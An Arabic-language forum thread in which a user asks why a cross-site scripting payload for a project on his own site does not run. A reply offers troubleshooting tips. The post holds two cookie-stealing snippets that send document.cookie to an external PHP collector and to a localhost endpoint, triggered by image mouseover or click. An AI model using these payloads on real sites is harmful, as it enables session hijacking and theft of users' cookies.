• 0

مساعدة في معرفة الخطأ في الكود

السلام عليكم 

احتاج تنفيذ هذا الكود في مشروعي وهو cross site scripting attack لموقع من تصميمي 

        

<body  >
<script>
function getCookies() {
document.location= " http://java.comlu.com/it/xss.php?index=" + document.cookie;
 
}
</script>
  
<img src="1.jpg"  onmouseover=' getCookies()' width"300px" height="100px"/>
</body>

او الكود الاخر

 <img src="1.jpg" width"300px" height="100px"onClick='document.location= " http://localhost:84/XSS/cookies.php?index=" + document.cookie'/>


ارجو المساعدة  لم يبقى لي سوى وقت قليل جدا جدا لتسليم المشروع ولكن الكود لاينفذ
 

تمّ تعديل بواسطة java
اخطاء املائية

انشر على الشّبكات الاجتماعية


رابط هذه المساهمة
  • 1

السلام عليكم،

تأكد من أنك بداية لا تستخدم أي إضافة أو مكافح فيروسات قد يمنع تنفيذ شفرات XSS كنوع من الحماية (مثل NoScript وسواها).

الرابط الخاص بموقعك لا يعمل، يبدو أن الاستضافة قامت بحظره أو إزالته.

قم أيضًا بوضع قيمة للـ cookie في المستند قبل محاولة سرقتها.. الصفحة بشكل افتراضي لا تملك أي cookie فمن الطبيعي ألا تحصل على أي قيمة :)

لا تنس الاطلاع أيضًا على جوابي في سؤالك السابق حول الاستغلال بدون استخدام document.location

 

تمّ تعديل بواسطة Shadi Habbal
1 شخص أعجب بهذا

انشر على الشّبكات الاجتماعية


رابط هذه المساهمة

يجب أن تكون عضوًا لدينا لتتمكّن من التعليق

انشاء حساب جديد

يستغرق التسجيل بضع ثوان فقط


سجّل حسابًا جديدًا

تسجيل الدخول

تملك حسابا مسجّلا بالفعل؟


سجّل دخولك الآن